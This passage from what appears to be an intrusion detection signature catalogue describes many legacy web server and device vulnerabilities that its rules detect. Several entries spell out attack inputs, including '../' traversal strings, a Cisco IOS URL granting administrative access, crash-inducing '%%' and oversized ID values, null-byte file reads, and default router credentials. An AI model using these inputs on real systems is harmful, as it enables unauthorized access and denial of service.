specially crafted input value(dot dot sequence, ../) to access files on the system. After received this type of requests, the
true_path() function does not properly validate user-supplied input through the request, then there is a chance to view
files on the web server including the mailman configuration files and passwords.
Signature ID: 1191
Cobalt RaQ .bash_history Vulnerability
Signature Description: Some applications do not perform stringent checks when validating the credentials of a client
host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator and access .bash_history file. Cobalt RaQ 1.1 is prone to this vulnerability .
Signature ID: 1192
DOT history access Vulnerability
Signature Description: This signature detects when an attacker retrieve the '.history' file. The web servers allows
attackers to retrieve the command history file. This file includes the list of command executed by the administrator, and
sensitive information such as password, user name. The Cobalt RaQ 1.1 is a vulnerable server. And this vulnerability is
possible for other servers also.
Signature ID: 1193
DOT htaccess access Vulnerability
Signature Description: UNIX based web servers, such as Apache and Netscape Enterprise Server, use ".htaccess" files
to customize security settings on a per-directory level. These files can specify things like what users have access to
what resources, hosts that are allowed or denied, and what type of authentication system to use. This type of data would
be most useful for carrying out an attack on the site.
Signature ID: 1194
DOT htpasswd access Vulnerability
Signature Description: Htpasswd is used to create and update the flat-files used to store user names and password for
basic authentication of HTTP users. This rule will triggers when an attacker to download the .htpasswd file, an attacker
can use this vulnerability to gain sensitive information such as user names, passwords.
155
Signature ID: 1195
Nsconfig access Vulnerability
Signature Description: .nsconfig file is used by Netscape Web server for configuration directives. It is a simple text file
which contains information about the exactly which folders have password protecting. Without this file we cannot
password protect directories. This rule will trigger's when an attacker probes for the .nsconfig file. This successful
exploitation can allow an attacker to gain access to the web server.
Signature ID: 1196
Wwwacl access Vulnerability
Signature Description: .WWWacl file containing important information, it will give the location of the web passwd
file. The .wwwacl is used by CERN-derived Web servers for configuration directives. This signature detects when an
attacker access for the '.wwwacl' file. This successful exploitation can allow an attacker to gain access to the web
server.
Signature ID: 1197
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
Signature Description: Internet Information Services, a set of Internet-based services for servers using Microsoft
Windows. Microsoft Personal Web Server 4.0 and Microsoft IIS 5.0 versions are vulnerable, these versions are
allowing a remote attacker to access any file or folder on the Web Server with "anonymous" access. An malicious
user(remote attacker) could send a specially-crafted URL containing Unicode characters that represent slashes ("/") and
backslashes ("\"). After received these type of request the server does not validate properly the user-given data, so
attacker can bypass sanity checks and deny such requests by using this type of requests framing, finally attacker can
access files and folders on the Web server with the privileges of the IUSR_ <machinename>account (an anonymous
user account for IIS).
Signature ID: 1199
Pacific Software Carello File Duplication and Source Disclosure Vulnerability
Signature Description: CarelloWeb allow to build and update online store and customer-friendly shopping cart system.
Carello, version 1.2.1, web may reveal the source code of files on the server. An attacker could use the "add.exe"
component in Carello Web to create copies of known files on the web server, using a different file extension for the
new file. An attacker could submit HTTP request for new file to view its source code and gain sensitive information,
such as usernames and passwords. No remedy available as of September, 2008.
Signature ID: 1200
/cgi-bin/// access Vulnerability
Bugtraq: 6145
Signature Description: This signature detects when an attacker access slash-slash sequence('//') to a URI, it is possible
for an attacker to disclose files on the vulnerable web server, effectively by passing any access controls. The vulnerable
server is Simple Web Server 0.5.1. And this vulnerability is possible for other web servers also.
156
Signature ID: 1201
ECWare CGI Denial Of Service Vulnerability
Bugtraq: 6066
Signature Description: ECware is Electronic Commerce Software for Windows NT that provides merchants with the
ability to sell physical and digital products over the Internet with real-time credit card authorizations. ECware ,version
4.0.0 and 5.0.0, is a denial of service vulnerability. The issue is triggered in the ECware.exe CGI program. The
ECware.exe CGI program does not exit properly when certain errors occur. Then the IIS(Internet Information Server)
stops responding to HTTP requests and errant ECware.exe process will not be terminated. If the web server stopped
and restarted to regain normal functionality. Some ECware.exe processes may continue to run and consume memory on
the system until the computer is rebooted. The issue is fixed in the version of ECware 5.1 or later. Update this latest
version for removing this issue, which is available at vendor's web site.
Signature ID: 1202
/home/ftp access
privileges to that of the administrator through /home/ftp access.
Signature ID: 1203
/home/www access
Nessus: 11032
privileges to that of the administrator through /home/www access.
Signature ID: 1204
/~ftp access Vulnerability
Signature Description: FTP(File Transfer Protocol), is the protocol for exchanging files over the Internet. It is used to
exchange files between computer accounts, to transfer files between an account and a desktop computer, or to access
software archives on the internet. This signature detects when an attacker send '/~ftp'. The successful exploitation can
allow an attacker to gain FTP permissions and read, write, or transfer files.
Signature ID: 1205
3Com Wireless Router 3CRADSL72 app_sta.stm access Vulnerability
Signature Description: Router is a computer whose software and hardware are usually tailored to the tasks of routing
and forwarding information. Routers generally contain a specialized operating system. 3Com 3CRADSL72 Wireless
Router is vulnerable to Information Disclosure and Authentication Bypassing. This is can allow a remote attacker to
disclose sensitive information such as the router name, primary and secondary DNS servers, default gateway. Attackers
could also reportedly gain administrative access to the router.
157
Signature ID: 1206
Admin_files directory access Vulnerability
Signature Description: Shopping cart programs can use admin_files directory for storing configuration files. This rule
detects when an attacker attempting to access the admin_files directory. This successful exploitation can allow an
attacker to gain unauthorized information and scanning web server for installed applications.
Signature ID: 1207
Allaire JRun Servlet DoS Vulnerability
Signature Description: JRun is a Java application server, supporting Java Server Pages, Java servlets and other Java
related technologies. The /servlet URL prefix is mapped as a handler for invoking servlets. Servlets are stored in a
hierarchical manner and are accessed via a naming convention of the type. Macromedia JRun 3.0 is vulnerable to denial
of service. Allaire JRUN 3.0 does not perform proper checks when validating the credentials of a client host connecting
to the services offered on a host server. Then there is chance to unauthorized access and possibly escalated privileges to
that of the administrator and access servlet/ file. A remote attacker can request a specially-crafted URL that contains
"/servlet/" in the path, followed by a long string of periods ("."), to consume all system resources on the JRun servlet
server.
Signature ID: 1209
Microsoft IIS Malformed .htr Request Vulnerability
Signature Description: Internet Information Services, a set of Internet-based services for servers using Microsoft
Windows. Microsoft IIS 4.0 and 5.0 with the IISADMPWD virtual directory installed versions are allowing a remote
attacker to cause a denial of service. A malicious user(remote attacker) could senad a malformed request to the
inetinfo.exe program, if this request to change password, the server CPU becomes fully utilized until the administrator
performs a reboot to regain normal functionality.
Signature ID: 1210
HTTP Request Basic Authorization Scheme Buffer Overflow Vulnerability
Signature Description: Some URLs require authentication in order for a user to gain access. A user agent that wishes to
authenticate itself with a server does so by including an Authorization request-header field with the request. RFC 2616
and 2617 suggest two types of authentication mechanisms "Basic" and "Digest". This rule triggers when a long HTTP
Basic authorization scheme header is observed. Oracle9i Database Server Release 2 is vulnerable to this kind of
vulnerability. A remote attacker could overflow a buffer by sending a large Authorization string and execute arbitrary
code on the system. Oracle has released a patch that can be obtained from Oracle Security Alert#58. Oracle Oracle9i
Standard Edition 9.2 .0.1,Oracle Oracle9i Personal Edition 9.2 .0.1,Oracle Oracle9i Enterprise Edition 9.2 .0.1 are
prone to this vulnerability .
Signature ID: 1211
BB4 Technologies Big Brother Directory Traversal Vulnerability
158
privileges to that of the administrator through BigBrother /bb-hostsvc.sh access. Sean MacGuire Big Brother 1.4 H
,Sean MacGuire Big Brother 1.4 g ,Sean MacGuire Big Brother 1.4,Sean MacGuire Big Brother 1.3,Sean MacGuire
Big Brother 1.2,Sean MacGuire Big Brother 1.1,Sean MacGuire Big Brother 1.0 9d,Sean MacGuire Big Brother 1.0
9c,Sean MacGuire Big Brother 1.0 9b,Sean MacGuire Big Brother 1.0 are prone to this vulnerability.
Signature ID: 1212
BitMover BitKeeper Daemon Mode Remote Command Execution Vulnerability
Bugtraq: 6588
Signature Description: BitKeeper is a cross platform commercial application for managing software development, it is
for distributed revision control(configuration management, SCM, etc.) of computer source code. A sophisticated
distributed system, BitKeeper competes largely against other professional systems such as Rational ClearCase and
Perforce. BitMover BitKeeper 3.0 is vulnerable version, When used in daemon mode, BitKeeper opens a listening
service that can be accessed via an ordinary http request. The malicious user(remote attacker) could send specially
crafted request, this server is not correctly processed the user given inputs, then it allows execution of arbitrary code.
Signature ID: 1213
BugPort Unauthorized Configuration File Viewing Vulnerability
Signature Description: The BugPort system is an open-source, web-based system to manage tasks and defects
throughout the software development process. BugPort is written in the cross-platform PHP language (using its objectoriented capabilities) and uses a relational database for storage/querying. BugPort is usefull for bug tracking
purposes(internal management of software development and QA). INCOGEN BugPort 1.090 to INCOGEN BugPort
1.098 all versions vulnerable, A malicious user(remote attacker) could send a specially crafted uri request to disclose
sensitive information. From these versions there is chance to disclose sensitive information to remote attackers. The
contents of the BugReport configuration file will be served to remote users who request the file. This could disclose
sensitive configuration information that may be useful when mounting further attacks.
Signature ID: 1214
CISCO PIX Firewall Manager directory traversal Vulnerability
Signature Description: Cisco PIX firewall manager (PFM), PFM is a Worldwide-Web-based application, it is based on
a hardened and includes a limited HTTP server. The PFM HTTP server runs on Windows NT computers. PIX firewalls
provide a wide range of security and networking services including, Network Address Translation (NAT) or Port
Address Translation (PAT), content filtering (Java/ActiveX), URL filtering, IPsec VPN, support for leading X.509 PKI
solutions, DHCP client/server. Cisco PIX Firewall 4.2.1 and Cisco PIX Firewall 4.1.6 versions are vulnerable,
these versions are allowing malicious user to retrieve arbitrary files from the web server. A malicious user(remote
attacker) could send a specifically crafted uri request to webserver, this request URI contains traversal style attacks
patterns(../../). After received this type of the requests the server is not validating properly the user given inputs,
then there is a chnace the malicious user(attacker) to retrieve potentially sensitive files which may aid them in further
compromise.
Signature ID: 1215
CISCO VoIP DOS ATTEMPT Vulnerability
Signature Description: The 7900 series VoIP Phones are a Voice-Over-IP solution distributed by Cisco Systems.It is
159
possible to deny service to users of this line of phones. By placing a request to the /StreamingStatistics script with a
stream ID of arbitrarily high value, the phone will reset itself, creating the inability to place or receive calls for a period
of up to thirty seconds. This has been reportedly reproduced by passing stream ID values of greater than 32768,
and consistently reproduced with a value of 120000. Cisco VoIP Phone CP-7960 3.2,Cisco VoIP Phone CP-7960
3.1,Cisco VoIP Phone CP-7960 3.0,,Cisco VoIP Phone CP-7940.2,,Cisco VoIP Phone CP-7940 3.1,Cisco VoIP Phone
CP-7940 3.0,Cisco VoIP Phone CP-7910 3.2,,Cisco VoIP Phone CP-7910 3.1,Cisco VoIP Phone CP-7910 3.0 are
prone to this vulnerability.
Signature ID: 1216
CISCO VoIP Web Interface System Memory Contents Information Leakage Vulnerability
Signature Description: The 7900 series VoIP Phones are a Voice-Over-IP solution distributed by Cisco
Systems. By placing a request to the /PortInformation script with a port ID of arbitrarily high value, the web server
will return a dump of the contents of phone memory. This has been reportedly reproduced by passing port ID values of
greater than 32768, and consistently reproduced with a value of 120000. Cisco VoIP Phone CP-7960 3.2,Cisco VoIP
Phone CP-7960 3.1,Cisco VoIP Phone CP-7960 3.0,,Cisco VoIP Phone CP-7940.2,,Cisco VoIP Phone CP-7940
3.1,Cisco VoIP Phone CP-7940 3.0,Cisco VoIP Phone CP-7910 3.2,,Cisco VoIP Phone CP-7910 3.1,Cisco VoIP Phone
CP-7910 3.0 are prone to this vulnerability.
Signature ID: 1217
Cisco IOS HTTP %% DOS Vulnerability
Signature Description: The HTTP server was introduced in IOS release 11.0 to extend router management to the
worldwide web. The defect appears in a function added in IOS releases 11.1 and 11.2 that parses special characters in a
URI of the format "%nn" where each "n" represents a hexadecimal digit. Cisco IOS 12.0.7 and prior versions are
vulnerable to denial of service. The vulnerability is exposed when an attempt is made to browse to router with %%
characters next to IP address or domain name(like "<router-ip>/%%"). After received these requests it is not correctly
parses "%%" and it enters an infinite loop. A watchdog timer expires two minutes later and forces the router to crash
and reload.
Signature ID: 1218
Cisco IOS HTTP configuration attempt vulnerability
Signature Description: Cisco IOS is router firmware developed and distributed by Cisco Systems. IOS functions on
numerous Cisco devices, including routers and switches.It is possible to gain full remote administrative access on
devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where
$NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.This
problem makes it possible for a remote user to gain full administrative privileges, which may lead to further
compromise of the network or result in a denial of service.
Signature ID: 1219
Compaq Web-based Management Agent Denial of Service vulnerability
Bugtraq: 8014
Signature Description: Compaq Web-Based Management Agent has been reported prone to a remote denial of service
vulnerability. The problem occurs when making malformed requests to the service. The resulting error reports a stack
160
overflow, however it has not been confirmed whether this issue is exploitable to corrupt memory. The problem may in
fact be the result of a NULL pointer dereference.
Signature ID: 1220
Trend Micro InterScan ContentFilter.dll access Vulnerability
Signature Description: Trend Micro InterScan eManager is a plug-in for InterScan which manages spam, message
content, and mail delivery. It can be managed through a web-based console interface. Trend Micro, InterScan
eManager 3.51 and Trend Micro, InterScan eManager 3.51J versions are vulnerable, it is a stack-based vulnerability.
Several CGI components of eManager contain a buffer overflow vulnerability which could allow an attacker to execute
arbitrary code within the Local System context. Several CGI components of eManager is not validating the user input
values, after received request with out proper validation cop-ying the given values(overly long values) in to static
buffer at that time that buffer will overflow, then there is a chance to execute arbitrary code within the Local System
context. This signature triggers when an attacker access to the 'ContentFilter.dll' file.
Signature ID: 1221
Crystal Reports crystalImageHandler.aspx directory traversal Vulnerability
Signature Description: Crystal reports is a powerful, dynamic, actionable reporting solution that helps you design,
explore, visualize, and deliver reports via the web or embedded in enterprise applications. Microsoft Visual Studio
.NET 2003, Outlook 2003 with Business Contact Manager, and Business Solutions CRM 1.2 versions are vulnerable,
this Crystal Reports and Crystal Enterprise Web Form Viewer is prone to a directory traversal vulnerability. These
versions can allow an (malicious user)attacker to retrieve and delete files, allowing for information disclosure and
denial of service attacks. A malicious user(remote attacker) can exploit this issue by sending directory traversal
sequences and requesting a file through a vulnerable parameter of one of the affected modules. Patches are at vendor
websites businessobjects and microsoft websites.
Signature ID: 1223
Microsoft FrontPage 2000 Internet Publishing Service Provider DAV File Upload Vulnerability
Nessus: 10498
Signature Description: Microsoft FrontPage (full name Microsoft Office FrontPage) is a WYSIWYG HTML editor and
web site administration tool from Microsoft for the Microsoft Windows line of operating systems. Microsoft FrontPage
2000 is vulnerable to file uploading, these misconfigured web servers allows remote clients to perform dangerous
HTTP methods such as PUT and DELETE.This can lead to unauthorized access and possibly deleting of some
important files through DELETE.
Signature ID: 1224
Demarc PureSecure Authentication Check SQL Injection Vulnerability
Signature Description: Demarc PureSecure is a commercially available graphical front-end for Snort, in addition to
being a generalized network monitoring solution. Snort is an open-source NIDS (Network Intrusion Detection System).
Demarc PureSecure will run on most Linux and Unix variants, as well as Microsoft Windows NT/2000/XP operating
systems.A vulnerability has been reported in some versions of PureSecure. User supplied input is used to construct a
SQL statement, allowing SQL injection attacks. Administrative access may be gained through exploitation of this
flaw.Demarc PureSecure 1.0.5 Windows and Demarc PureSecure 1.0.5 Unix are prone to this vulnerability.
161
Signature ID: 1225
Mountain-net WebCart Exposed Orders Vulnerability (2)
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Certain
poorly configured default installations leave customer order information in remotely accessible text files, including
credit card details and other sensitive information. These files include orders/checks.txt, config/check.txt,
config/mountain.cfg, and possibly others. Exact version information has not been determined; this default configuration
issue may have been resolved in more recent versions. Regardless, it should be noted that this is not a vulnerability in
the strictest sense but rather a poor configuration issue. Mountain Network Systems Inc. WebCart 1.0 is prone to this
vulnerability.
Signature ID: 1226
Mountain-net WebCart Exposed Orders Vulnerability
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Certain
poorly configured default installations leave customer order information in remotely accessible text files, including
credit card details and other sensitive information. These files include orders/checks.txt, config/import.txt,
config/mountain.cfg, and possibly others. Exact version information has not been determined; this default configuration
issue may have been resolved in more recent versions. Regardless, it should be noted that this is not a vulnerability in
the strictest sense but rather a poor configuration issue.Mountain Network Systems Inc. WebCart 1.0 is prone to this
vulnerability.
Signature ID: 1227
OpenView Manager Denial of Service Vulnerability .
Signature Description: Ovactiond is part of the system management software packages OpenView and Netview,
distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.A
problem with the software makes it possible for a remote user to execute commands on a managed system with the
privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed
with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in
quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized. IBM Tivoli NetView
6.0, IBM Tivoli NetView 5.1, IBM Tivoli NetView 5.0, HP OpenView Network Node Manager 6.10, HP OpenView
Network Node Manager 5.0 1 are vulnerable versions.
Signature ID: 1228
ICQ Webfront HTTP Denial of Service Vulnerability
Signature Description: The guestbook.cgi script allows you to define "guestbook" pages within your Web site to which
visitors can add their own comments. Your Web site may include as many guestbook pages as you wish. Each
guestbook page is configured by creating both an HTML page that visitors will see, and a configuration file that
controls how the new-comment form will look, whether the visitor will be sent a thank-you note, whether you'll be
notified of visitors, etc. ICQ, ICQ Web Front Windows 9x is vulnerable to denial of service attck, because it is not
validating properly the user supplied data through requests. A remote attacker can send a question mark (?) appended to
a URL to cause the targeted user's Web Front to crash and possibly crash the entire system.
162
Signature ID: 1229
ICQ webserver Denial of Service Vulnerability
Signature Description: Web server is a computer with a boot device or other disk containing a web site. A remote
attackers could send a request by using "dot dot"(../) sequence to access arbitrary files outside of the user's personal
directory. After received this type of request it is not validating properly the user given input so there is chance to
access arbitrary files.
Signature ID: 1230
BRS WebWeaver ISAPISkeleton.dll Cross-Site Scripting Vulnerability
Signature Description: BRS WebWeaver is a free personal web server that run on the Windows platform. BRS
WebWeaver 1.07. and Earlier versions are vulnerable to a cross-site scripting. A remote attacker can create a malicious
link to the vulnerable server that includes embedded HTML and script code. If this link is followed by a victim user,
hostile code embedded in the link may be rendered in the user's browser in the context of the server.Successful
exploitation could permit theft of cookie-based authentication credentials or other attacks.
Signature ID: 1231
BEA WebLogic XSS in InteractiveQuery.jsp access Vulnerability
Signature Description: The BEA WebLogic InteractiveQuery.jsp example application is a CGI application that
demonstrates the use of arguments to query a database. BEA WebLogic 8.1 and prior are vulnerablr, WebLogic
InteractiveQuery.jsp is prone to a cross-site scripting vulnerability. A malicious user(remote attacker) s reported to
exist due insufficient sanitization of user-supplied data in an initialization argument called 'person'. It has been reported
that if an invalid value is passed to this argument, the software returns the value back to the user in a results page
without proper sanitization. The problem may allow a remote attacker to execute HTML or script code in the browser
of a user following a malicious link created by an attacker.Successful exploitation of this attack may allow an attacker
to steal cookie-based authentication information that could be used to launch further attacks. No remedy available
as of July 2008.
Signature ID: 1232
Invision Power Board Search.PHP "st" SQL Injection Vulnerability
Signature Description: Invision Power Services is one of the world's leading providers of community solutions.
 Invision Power Board is vulnerable to SQL injection attack. It is present in the search.php" script. A malicious
user(remote attacker) may corrupt the resulting SQL queries (there are at least two) by specially crafting a value for the
"st" variable. The impact of this vulnerability depends on the underlying database, tt may be possible to corrupt/read
sensitive and any manipulations on the database, execute commands/procedures on the database server or possibly
exploit vulnerabilities in the database itself through this condition. It has been reported that this issue may also affect
the sources/Memberlist.php' and the 'sources/Online.php' scripts. Patches are available at vendor website.
Signature ID: 1233
L3retriever HTTP Probe
163
privileges to that of the administrator through L3retriever HTTP Probe.
Signature ID: 1234
Linksys router default username and password login attempt Vulnerability
Nessus: 10999
Signature Description: LinkSys router is the general design is similar across all models. Therefore, the setup is similar
across all models. Some applications do not perform stringent checks when validating the credentials of a client host
connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator in Linksys router.
Signature ID: 1235
Lotus Domino Delete Document attempt Vulnerability
Signature Description: Lotus Domino is an IBM server product that provides test, deploy, and manage distributed,
enterprise-grade e-mail, collaboration capabilities, custom application platform, database, application. server,
administration, Web server. This rule detects when an attacker attempts to delete documents from a Lotus Domino
server.
Signature ID: 1236
Lotus Domino Server Directory Traversal Vulnerability
Signature Description: Lotus Domino is an IBM server product that provides enterprise-grade e-mail, collaboration
capabilities, and custom application platform. Lotus Domino 5.0.6, Lotus Domino 5.0.5, Lotus Domino 5.0.3 and Lotus
Domino 5.0.2 are vulnerable to directory traversal on the web server. A remote attacker can send an invalid request,
that request URL containing .nsf, .box, or .ns4 with "dot dot" sequences (/../) to read sensitive files on the Web server.
In order to exploit this vulnerability, the server must be installed under the root directory. This vulnerability does not
work with Internet Explorer because it removes the .nsf from the URL.
Signature ID: 1237
Lotus Domino Edit Document attempt Vulnerability
Signature Description: Lotus Domino is an IBM server product that provides test, deploy, and manage distributed,
enterprise-grade e-mail, collaboration capabilities, custom application platform, database, application. server,
administration, Web server. This rule detects when an attacker attempts to edit documents on a Lotus Domino server.
Signature ID: 1238
Macromedia Sitespring Default Error Page Cross Site Scripting Vulnerability
Signature Description: Macromedia SiteSpring is a J2EE compliant website production management solution. The
Macromedia SiteSpring server runs on Microsoft Windows operating systems. By using this good way to manage Web
site development. As a well-structured product, it provides task management, discussion groups, versioning and a client
Web site all in one package. Macromedia Sitespring 1.2 .0 is vulnerable version, these verions contains a cross site
scripting issue. A user could send a request, when an HTTP 500 error is returned, the user supplied data is included in
the generated HTML. This data is not properly sanitized, and it is possible to include arbitrary HTML, include
JavaScript.
164
Signature ID: 1239
McAfee ePO file upload attempt Vulnerability
Signature Description: McAfee's ePolicy Orchestrator server is responsible for distributing packages and code to
ePolicy agents. McAfee ePolicy Orchestrator (ePO) 2.5.1 Patch 13 and 3.0 SP2a Patch 3 is vulnerable to a remote code
execution. This vulnerability is due to insufficient sanitization of user supplied requests to the spipe/file via http post
method. This vulnerability is fixed in Orchestrator version 3.0 Service Pack 2a. Administrators are advised to update
Orchestrator version 3.0 Service Pack 2a version or later version to resolve this vulnerability.
Signature ID: 1240
MySQL MaxDB WebAgent WebSQL Password Parameter Remote Buffer Overflow
Vulnerability
Signature Description: MaxDB is a SAP-certified open source database for Online Transaction Processing (OLTP) and
On-Line Analytical Processing (OLAP)usage. MaxDB version 7.5.00 is vulnerable, in this version exists a stack-based
buffer overflow vulnerability. A malicious user(remote attacker) could send a specially-crafted long password, the
websql CGI application not validating the user inputs properly, at the time of processing these input values the buffer
will overflow then execute arbitrary code on the system with SYSTEM level privileges.
Signature ID: 1241
MySQL MaxDB WebAgent WebSQL Password Buffer Overflow Vulnerability
Signature Description: MaxDB is a SAP-certified open source database for Online Transaction Processing (OLTP) and
On-Line Analytical Processing (OLAP)usage. A stack-based buffer overflow vulnerability exists in MaxDB version
7.5.00 caused by improper bounds checking in the websql CGI application. By supplying a specially-crafted long
password, a remote attacker could overflow a buffer and execute arbitrary code on the vulnerable system. This
vulnerability is fixed in MySQL AB MaxDB 7.5 .00.18. Administrators are advised to update MySQL AB MaxDB 7.5
.00.18 version or later version to resolve this vulnerability.
Signature ID: 1242
NetGear router default password login attempt with admin/password Vulnerability
Nessus: 11737
Signature Description: Router is a computer whose software and hardware are usually tailored to the tasks of routing
and forwarding information. Routers generally contain a specialized operating system. Netgear routers have a default
username and password of "admin" and "password", if this is not changed by the administrator it is possible for an
attacker to gain administrative access to the router. Because this default username and passwords are hardcoded in the
product source.
Signature ID: 1243
NetObserve authentication bypass attempt Vulnerability
Bugtraq: 9319
Signature Description: NETObserve is a software solution that can be used to remotely monitor and control Windows
based machines. It's interface is accessed via HTTP. By setting a cookie value, used to send login information to
NETObserve, to 0 an attacker can bypass any checks on login credentials. This can present the attacker with
165
administrative privileges to the NETObserve application which can be used to manage other remote client machines.
ExploreAnywhere Software NETObserve 2.0 is prone to this vulnerability.
Signature ID: 1244
Netscape Enterprise directory listing attempt Vulnerability
Signature Description: Netscape Enterprise Server is a web server, it was developed by Netscape Communications
Corporation. The product has since been renamed Sun Java System Web Server, reflecting the product's acquisition by
Sun Microsystems. Netscape Enterprise Server 4.0 version is vulnerable, Netscape Enterprise Server 4.0 version could
allow a remote attacker to obtain a directory listing of the server. A remote attacker can connect to the server using
telnet and send an "INDEX / HTTP/1.0" request to cause the server to display the directory listing. By using this
vulnerability attacker can gain access to sensitive information. No remedy available.
Signature ID: 1245
Unify eWave ServletExec DoS Vulnerability
Signature Description: Unify's eWave ServletExec is a JSP and a Java Servlet engine which is to be used as a plug-in
to popular web servers like Apache, IIS, Netscape. It is possible to send a URL request which causes the ServletExec
servlet engine to terminate abruptly. The web server, however, is not affected. Unify eWave ServletExec 3.0c is
vulnerable to denial of service. A remote attacker could send a specially-crafted URL that contains the "/servlet/"
string, which invokes the ServletExec servlet and causes an exception if the servlet is already running, this causes the
servlet engine to crash.
Signature ID: 1246
Netscape Unixware overflow vulnerability
Signature Description: The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnerable to a
remote buffer overlow via a long HTTP GET request with more than 367 characters. By default, the httpd listens on
port 457 of the UnixWare host and serves documentation via http. This vulnerability is fixed in latest versions. Users
are advised to update the latest version to resolve this issue.
Signature ID: 1247
Oracle 10g iSQLPlus login.unix connectID overflow Vulnerability
Signature Description: A database server is a computer program that provides database services to other computer
programs or computers, as defined by the client-server model. Database management systems frequently provide
database server functionality. Oracle Database is a relational database management system (RDBMS) produced
and marketed by Oracle Corporation. Oracle9i delivers a new, easy to use SQL*Plus tool called iSQL*Plus that is
delivered through a web browser. Oracle, Database Server 10.1.0.2 and prior versions are vulnerable, these versions
contain buffer overflow vulnerability. A malicious user(remote attacker) could send a specially-crafted login request it
contains over-long Connect-ID, while processing this request buffer overflow will occur on the server, then the attacker
could run arbitrary code in the context of the Web server which is potentially a serious threat especially if this is also
the database server.
166
Signature ID: 1248
Oracle iSQLPlus login.uix username overflow Vulnerability
contain buffer overflow vulnerability. A malicious user(remote attacker) could send a specially-crafted login request it
contains over-long user name, while processing this request buffer overflow will occur on the server, then the attacker
could run arbitrary code in the context of the Web server which is potentially a serious threat especially if this is also
the database server.
Signature ID: 1249
Oracle iSQLPlus sid overflow Vulnerability
contain buffer overflow vulnerability. A malicious user(remote attacker) could send a specially-crafted request, while
processing this request buffer overflow will occur on the server, then the attacker could run arbitrary code in the
context of the Web server which is potentially a serious threat especially if this is also the database server.
Signature ID: 1250
Oracle iSQLPlus username overflow Vulnerability
contain buffer overflow vulnerability. A malicious user(remote attacker) could send a specially-crafted request to
isqlplus it contains over-long user name, while processing this request buffer overflow will occur on the server, then the
attacker could run arbitrary code in the context of the Web server which is potentially a serious threat especially if this
is also the database server.
Signature ID: 1251
PIX firewall manager directory traversal vulnerability
Signature Description: The PIX Firewall Manager (PFM) is a software product that allows the configuration of Cisco
PIX Firewall devices via a web-based GUI. PIX Firewall Manager is installed and run on a standard Windows NT
workstation or server that serves as the management station. Cisco PIX Firewall 4.2.1 and Cisco PIX Firewall 4.1.6 are
vulnerable to a arbitrary file access. This issue is due to the server not properly sanitizing user input, specifically
167
traversal style attacks (../../) supplied via the URI. This issue is fixed in Cisco PIX Firewall(4.2.2, 4.1.6 b).
Administrators are advised to update latest version to resolve this issue.
Signature ID: 1252
PeopleSoft PeopleBooks psdoccgi.exe Denial of Service and Directory Traversal Vulnerability
Signature Description: The PeopleSoft PeopleBooks component provides a CGI based search application as part of the
default installation. Oracle, PeopleSoft PeopleTools 8.40, Oracle, PeopleSoft PeopleTools 8.41, Oracle, PeopleSoft
PeopleTools 8.42 and Oracle, PeopleSoft PeopleTools 8.43 are vulnerable versions. These versions of PeopleTools's
may allow a remote attacker to traverse outside the server root directory in order to gain access to sensitive information.
After received the request from users it is not validating properly, so the remote attacker ciould send a request
'psdoccgi.exe, that request contains invalid values to 'headername' and 'footername' arguments of the psdoccgi.exe CGI
script.
Signature ID: 1253
Paul M. Jones Phorecast Remote Arbitrary Code Execution Vulnerability
Signature Description: Phorecast is freely available, open-source web-based single-user email. It allows users to send
and receive email through a web-based interface. A problem exists in Phorecast Paul M. Jones Phorecast 0.30a is
version, that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of
the web server process). A remote attacker can send to the server a specially-crafted URL that passes arbitrary data
using the $includedir variable to specify a malicious file containing PHP code to be executed on the host. As a result,
the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker.
Signature ID: 1254
Quicktime User-Agent buffer overflow vulnerability
Signature Description: The Apple Quicktime Streaming Server is used to serve client machines with streaming media
content using TCP/IP. Apple Quicktime Streaming Server 4.1.3 and Apple Darwin Streaming Server 4.1.3 are
vulnerable to a denial of service. This issue presents itself when the software attempts to parse DESCRIBE request with
a User-Agent field that contains more than 255 characters. Administrators are advised to update the latest version to
resolve this issue.
Signature ID: 1255
RBS ISP/newuser command based directory traversal Vulnerability
Signature Description: Extent RBS ISP is a full OSS package which combines RADIUS, user management, Web
signup, billing, invoicing and other valuable features that will grow user IP service provider business. Extent, Extent
RBS-ISP 2.63 and prior versions are vulnerable to read any file from the server. A remote attacker could send a
specially crafted request URL that contains "dot dot" (/../) sequences as parameter value for 'image' parameter to read
any file under the Extent RBS ISP directory and gain access to sensitive information, such as credit card information,
usernames, and passwords, which are stored in the rbsserv.mdb database.
168
Signature ID: 1256
Martin Hamilton ROADS File Disclosure Vulnerability
Signature Description: The search.pl program is a Common Gateway Interface(CGI) program used to provide an end
user search front end to ROADS databases. When accessed with no CGI query, the program can return an HTML form
to the user to fill in to make a query. Martin Hamilton ROADS 2.3 is vulnerable to read arbitrary files from the server
host. A remote attacker could send requet by specially crafted URL composed of '%00' sequences along with the
known filename will disclose the requested file, i.e., by specifying the file name in the "form" parameter and
terminating the filename with a null byte. After received this type of request it is not validating properly the user given
inputs then there is chance to read files from the server host, finally this can lead to unauthorized access and possibly
escalated privileges to that of the administrator.
Signature ID: 1257
Real Server DESCRIBE buffer overflow vulnerability
Signature Description: Helix Universal Server version 9.0 streams the widest variety of media, such as audio, video,
animation, images, and text, to the broadest range of media players, including RealOne Player, Windows Media Player,
and Apple QuickTime Player. Helix Universal Server version 9 and prior are vulnerable to a buffer overflow via
sending a long string to describe command. This vulnerability is fixed in Real Networks Helix Universal Server 9.0.2
.802. Users are advised to update the Real Networks Helix Universal Server 9.0.2 .802 or later version to resolve this
vulnerability.
Signature ID: 1258
Trend Micro InterScan eManager buffer overflow Vulnerability
values, here the attacker accessing through "SFNotification.dll", after received request with out proper validation copying the given values(overly long values) in to static buffer at that time that buffer will overflow, then there is a chance
to execute arbitrary code within the Local System context.
Signature ID: 1259
